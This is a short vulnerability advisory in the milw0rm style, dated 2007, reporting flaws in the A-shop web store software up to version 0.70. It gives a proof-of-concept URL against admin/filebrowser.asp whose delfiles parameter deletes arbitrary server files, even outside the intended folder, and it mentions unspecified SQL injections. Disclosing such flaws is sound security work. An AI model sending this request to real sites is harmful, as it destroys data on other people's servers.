17 lines
431 B
Text
Executable file
17 lines
431 B
Text
Executable file
A-shop <=0.70 Multiple vulnerabilities
|
|
|
|
Found Bug: Timq
|
|
site:http://private-node.net
|
|
email:timq@hushmail.com
|
|
|
|
|
|
Vendor:http://www.rammdev.com/ashop/
|
|
|
|
PoC:
|
|
http://site.com/admin/filebrowser.asp?folder=products&delfiles=[del any file on server]
|
|
|
|
It is possible to delete not only the files in the folders listed,
|
|
but also ouside its directory.
|
|
Also possible sql injections in other areas.
|
|
|
|
# milw0rm.com [2007-07-18]
|